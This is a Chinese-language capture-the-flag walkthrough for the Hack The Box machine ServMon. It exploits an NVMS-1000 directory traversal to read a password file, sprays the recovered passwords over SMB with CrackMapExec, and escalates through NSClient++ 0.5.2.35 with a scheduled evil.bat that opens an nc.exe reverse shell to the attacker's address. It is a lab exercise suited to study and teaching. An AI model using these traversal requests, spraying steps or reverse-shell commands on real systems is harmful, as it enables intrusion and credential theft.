Hack-The-Box-walkthrough[ServMon]

Posted on Edited on In Views: Word count in article: 2.2k Reading time ≈ 8 mins.

介绍

操作系统:Windows
难度:容易
点数:20
发行:2020年4月11日
IP:10.10.10.184

user一血用时:3小时08分钟06秒。
root一血用时:3小时34分钟10秒。

  • my htb rank

信息收集

上nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
C:\Users\HASEE>nmap -sC -sV -v -p- 10.10.10.184 --min-rate=10000
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp    open  http
| fingerprint-strings:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5666/tcp  open  tcpwrapped
6063/tcp  open  x11?
6699/tcp  open  napster?
7680/tcp  open  pando-pub?
8443/tcp  open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     refo
|_    2-contai
| http-methods:
|_  Supported Methods: GET
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after:  2021-01-13T13:24:20
| MD5:   1d03 0c40 5b7a 0f6d d8c8 78e3 cba7 38b4
|_SHA-1: 7083 bd82 b4b0 f9c0 cc9c 5019 2f9f 9291 4694 8334
|_ssl-date: TLS randomness does not represent time
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC

发现21端口可以使用Anonymous用户无需密码登录

里面发现2个用户文件夹

Nadine

1
2
3
4
5
6
7
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

Nathan

Notes to do.txt

1
2
3
4
5
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

80端口上有一个web应用程序NVMS-1000,为目录遍历漏洞,网上能搜索到exploit

  • NVMS-1000-Directory-Traversal

查看该exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

利用此漏洞和之前收集的文本文件的信息,可有读出下面的密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
If-Modified-Since: 0
Authorization: Basic Y3F3Yzpxd2M=
Content-Type: text/plain;charset=UTF-8
Content-Length: 103
Origin: http://10.10.10.184
Connection: close
Referer: http://10.10.10.184/Pages/login.htm
Cookie: dataPort=6063
1
2
3
4
5
6
7
8
9
10
11
12
13
HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo: 

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

在8443端口发现搭建了https服务,搭建了NSClient++的,参考下面的url

  • About-NSClient++

有了密码,现在使用Marcello提供的CrackMapExec对其进行测试以识别帐户(Nadine或Nathan)以及关联的密码!

  • CrackMapExec
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali:~/vulnhub/ServMon# crackmapexec smb 10.10.10.184 -u Nadine -p pass.txt 
CME          10.10.10.184:445 SERVMON         [*] Windows 10.0 Build 18362 (name:SERVMON) (domain:SERVMON)
CME          10.10.10.184:445 SERVMON         [-] SERVMON\Nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
CME          10.10.10.184:445 SERVMON         [-] SERVMON\Nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
CME          10.10.10.184:445 SERVMON         [-] SERVMON\Nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
CME          10.10.10.184:445 SERVMON         [+] SERVMON\Nadine:L1k3B1gBut7s@W0rk 
[*] KTHXBYE!
root@kali:~/vulnhub/ServMon# crackmapexec smb 10.10.10.184 -u Nathan -p pass.txt 
CME          10.10.10.184:445 SERVMON         [*] Windows 10.0 Build 18362 (name:SERVMON) (domain:SERVMON)
CME          10.10.10.184:445 SERVMON         [-] SERVMON\Nathan:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
CME          10.10.10.184:445 SERVMON         [-] SERVMON\Nathan:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
CME          10.10.10.184:445 SERVMON         [-] SERVMON\Nathan:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
CME          10.10.10.184:445 SERVMON         [-] SERVMON\Nathan:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE 
CME          10.10.10.184:445 SERVMON         [-] SERVMON\Nathan:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE 
CME          10.10.10.184:445 SERVMON         [-] SERVMON\Nathan:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE 
CME          10.10.10.184:445 SERVMON         [-] SERVMON\Nathan:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE 
[*] KTHXBYE!

现在有了账号密码

Nadine/L1k3B1gBut7s@W0rk

然后使用密码访问其共享,发现并没有权限

1
2
3
4
5
6
7
8
9
10
root@kali:~/vulnhub/ServMon# crackmapexec smb 10.10.10.184 -u Nadine -p L1k3B1gBut7s@W0rk --shares
CME          10.10.10.184:445 SERVMON         [*] Windows 10.0 Build 18362 (name:SERVMON) (domain:SERVMON)
CME          10.10.10.184:445 SERVMON         [+] SERVMON\Nadine:L1k3B1gBut7s@W0rk 
CME          10.10.10.184:445 SERVMON         [+] Enumerating shares
CME          10.10.10.184:445 SERVMON         SHARE           Permissions
CME          10.10.10.184:445 SERVMON         -----           -----------
CME          10.10.10.184:445 SERVMON         ADMIN$          NO ACCESS
CME          10.10.10.184:445 SERVMON         IPC$            READ
CME          10.10.10.184:445 SERVMON         C$              NO ACCESS
[*] KTHXBYE!

之后ssh连接,然后切换到目录下,得到user.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
23/04/2020  07:25                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,427,053,568 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
daf5f2dab64783e2c42e4249e9821ab7

提权

访问NSClient++的Web界面

执行命令查看密码

1
2
nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT

登录的时候却发现登陆失败,经过研究发现是因为nsclient.ini将指定的host对Web界面的访问。仅允许从本地服务器接口(127.0.0.1):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
´╗┐# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
...

现在使用ssh转发8443tcp端口到本地127.0.0.1

  • SSH-Port-Forwarding-Example
1
ssh -L 8443:127.0.0.1:8443 Nadine@10.10.10.184

运行上面的命令之后,成功的访问到了web界面

利用NSClient++ 0.5.2.35 提权漏洞进行提权

参考exploit

  • NSClient++0.5.2.35-Privilege-Escalation

查看exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64

Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file.  From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.  

The user is able to enable the modules to check external scripts and schedule those scripts to run.  There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere.  Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation.  A reboot, as far as I can tell, is required to reload and read the changes to the web config.  

Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.

Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
	C:\Program Files\NSClient++>nscp web -- password --display
	Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine
	@echo off
	c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine
	nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
	- foobar
		command = c:\temp\evil.bat

6. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
	- foobar
		interval = 1m
		command = foobar

7. Restart the computer and wait for the reverse shell on attacking machine
	nc -nlvvp 443
	listening on [any] 443 ...
	connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
	Microsoft Windows [Version 10.0.17134.753]
	(c) 2018 Microsoft Corporation. All rights reserved.

	C:\Program Files\NSClient++>whoami
	whoami
	nt authority\system
	
Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System

先查看自己的版本看看是否受影响

1
2
3
4
nadine@SERVMON C:\Program Files\NSClient++>nscp test
D       core NSClient++ 0.5.2.35 2018-01-28 x64 Loading settings and logger...
C:\Program Files\NSClient++\nsclient.log could not be opened, Discarding: debug: NSClient++ 0.5.2.35 2018-01-28 x64 Loading se
ttings and logger...

确实受到此漏洞的影响,下面先新建一个bat脚本,放到c:\Temp\目录下面

evil.bat

1
2
@echo off
c:\temp\nc.exe 10.10.14.4 443 -e cmd.exe

然后将nc.exe放入c:\temp\目录下

如下图配置一个脚本,以备之后点击之后运行bat文件弹回shell

从界面上的“control”按钮重新启动NSClient服务;

从Web界面的“queries”选项卡运行上一个脚本…

成功的返回了shell

1
2
3
4
5
6
7
8
9
10
C:\Users\HASEE\Desktop\hack the box靶机渗透\ServMon>nc.exe -lvp 443
listening on [any] 443 ...
10.10.10.184: inverse host lookup failed: h_errno 11004: NO_DATA (11004:11004)
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.184] 50272: NO_DATA (11004:11004)
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

并且得到了最后的root.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Administrator\Desktop

08/04/2020  23:12    <DIR>          .
08/04/2020  23:12    <DIR>          ..
23/04/2020  08:58                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,433,795,584 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
887fe3797897795b474ceba6a399f7bd

知识点总结:

  • Anonymous用户无需密码登录21 ftp
  • NVMS-1000目录遍历漏洞
  • CrackMapExec对smb进行测试账户及密码
  • ssh本地端口转发
  • NSClient++ 0.5.2.35 提权漏洞
  • 使用nc.exe 10.10.14.4 443 -e cmd.exe命令反弹windows的cmd shell

Game over

The end,to be continue…